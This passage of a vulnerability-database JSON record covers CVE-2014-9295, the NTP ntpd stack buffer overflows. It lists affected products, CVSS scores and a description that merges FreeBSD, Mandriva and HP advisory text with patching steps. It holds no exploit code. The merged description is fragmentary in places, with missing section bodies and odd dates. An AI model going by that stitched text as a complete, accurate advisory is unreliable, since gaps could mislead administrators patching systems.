        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura system manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.5"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura session manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura presence services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "aura experience portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura experience portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.0"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "aura conferencing standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura conferencing sp1 standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.8.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.1"
      },
      {
        "model": "network time protocol",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.8"
      },
      {
        "model": "junos os 14.2r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1x55-d16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1x50-d90",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3x48-d15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x44-d50",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "smartcloud entry fp",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.110"
      },
      {
        "model": "wx5004-ei (comware r2507p35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "vsr (comware r0204p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "vcx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.8.17"
      },
      {
        "model": "(comware r1513p95",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v19105)"
      },
      {
        "model": "u200s and cs (comware f5123p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "u200a and m (comware f5123p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "smb1920 (comware r1106",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "smb1910 (comware r1108",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "smb (comware r1105",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "16205)"
      },
      {
        "model": "secblade iii (comware r3820p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "secblade fw (comware r3181p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr50 ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr50 g2 r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr50 epu ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr50 r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr4000 (comware r0106p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "msr316 ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr301x ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr3000 (comware r0106p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "msr30-1x r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr30-16 r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr30 ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr30 r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr2000 (comware r0106p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "msr20-1x ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr20-1x (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr20-1x r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr20 ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr20 (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr20 r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5-"
      },
      {
        "model": "msr1000 ru r2513l61",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "msr1000 (comware r0106p31",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "msr1000 (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9xx5)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "93x5)"
      },
      {
        "model": "msr 50-g2 (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "505)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-1x5)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "30-165)"
      },
      {
        "model": "msr (comware r2513p45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "305)"
      },
      {
        "model": "hsr6800 ru r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "hsr6800 (comware r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hsr6602 ru r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "hsr6602 (comware r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hp870 (comware r2607p35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hp850 (comware r2607p35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hp830 (comware r3507p35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hp6000 (comware r2507p35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "f5000-c/s (comware r3811p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "f5000-a (comware f3210p23",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "f1000-s-ei (comware r3734p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "f1000-e (comware r3181p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "f1000-a-ei (comware r3734p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "a6600 (comware r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "9500e (comware r1828p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "(comware r3627p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "88005)"
      },
      {
        "model": "(comware r2122",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)"
      },
      {
        "model": "(comware r6708p10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75005)"
      },
      {
        "model": "ru r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66025"
      },
      {
        "model": "rse ru r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66005"
      },
      {
        "model": "rpe ru r3303p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66005"
      },
      {
        "model": "(comware r2311p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59207)"
      },
      {
        "model": "(comware r2311p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59007)"
      },
      {
        "model": "(comware r1118p11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58305)"
      },
      {
        "model": "(comware r1809p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58205)"
      },
      {
        "model": "(comware r7006p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58007)"
      },
      {
        "model": "(comware r1809p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58005)"
      },
      {
        "model": "(comware r2311p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57007)"
      },
      {
        "model": "5500si (comware r2221p08",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "hi (comware r5501p06",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55005)"
      },
      {
        "model": "(comware r3108p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51307)"
      },
      {
        "model": "(comware r1112",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129007)"
      },
      {
        "model": "(comware r7328p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125007)"
      },
      {
        "model": "(comware r7169p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "119007)"
      },
      {
        "model": "(comware r7150",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105007)"
      },
      {
        "model": "vipr srm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": "3.6.1"
      },
      {
        "model": "m\u0026r 6.5u1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "BID",
        "id": "71761"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.2.7",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Stephen Roettger and Neel Mehta of the Google Security Team.",
    "sources": [
      {
        "db": "BID",
        "id": "71761"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-9295",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2014-9295",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-9295",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2014-9295",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. \nSuccessful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a  denial-of-service condition. \nNetwork Time Protocol 4.2.7 and prior are vulnerable. \nCorrected:      2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE)\n                2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3)\n                2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15)\n                2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE)\n                2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7)\n                2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17)\n                2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24)\n                2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE)\n                2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21)\nCVE Name:       CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\nII.  [CVE-2014-9293]\nThe ntp-keygen(8) utility is also affected by a similar issue.  [CVE-2014-9296]\n\nIII. Impact\n\nThe NTP protocol uses keys to implement authentication.  The weak\nseeding of the pseudo-random number generator makes it easier for an\nattacker to brute-force keys, and thus may broadcast incorrect time stamps\nor masquerade as another time server. [CVE-2014-9295]\n\nIV.  Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected.  Because the issue may lead to remote root compromise, the\nFreeBSD Security Team recommends system administrators to firewall NTP\nports, namely tcp/123 and udp/123 when it is not clear that all systems\nhave been patched or have ntpd(8) stopped. \n\nV. \n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch\n# fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc\n# gpg --verify ntp.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the ntpd(8) daemons, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/8/                                                         r276073\nreleng/8.4/                                                       r276154\nstable/9/                                                         r276073\nreleng/9.1/                                                       r276155\nreleng/9.2/                                                       r276156\nreleng/9.3/                                                       r276157\nstable/10/                                                        r276072\nreleng/10.0/                                                      r276158\nreleng/10.1/                                                      r276159\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. This situation may be exploitable by an attacker\n (CVE-2014-9296). \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n http://advisories.mageia.org/MGASA-2014-0541.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 25fe56fc0649ac9bb83be467969c2380  mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm\n 9409f5337bc2a2682e09db81e769cd5c  mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm\n df65cc9c536cdd461e1ef95318ab0d3b  mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm \n 53f446bffdf6e87726a9772e946c5e34  mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFUqn7vmqjQ0CJFipgRAhTAAKCfH+XdZfDmtmE7lgzpV939wjHFdgCfZWiZ\nl2lk5bD8X4tOzwVyLnhX7Dg=\n=JIIF\n-----END PGP SIGNATURE-----\n. \n\nSee the RESOLUTION\n section for a list of impacted hardware and Comware 5, Comware 5 Low\nEncryption SW, Comware 7, and VCX versions. Family\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n CVE #\n\n8800 (Comware 5)\n R3627P04\n JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP\n8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control\nUnit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis,\nJC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808\nRouter Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis,\nJC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing\nUnit, JC597A HP 8800 Single Fabric Main Processing Unit\n\n CVE-2014-9295\n\nA6600 (Comware 5)\n R3303P18\n JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608\nRouter Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis,\nJC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing\nUnit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP\n6600 RPE-X1 TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6602 (Comware 5)\n R3303P18\n JC176A HP 6602 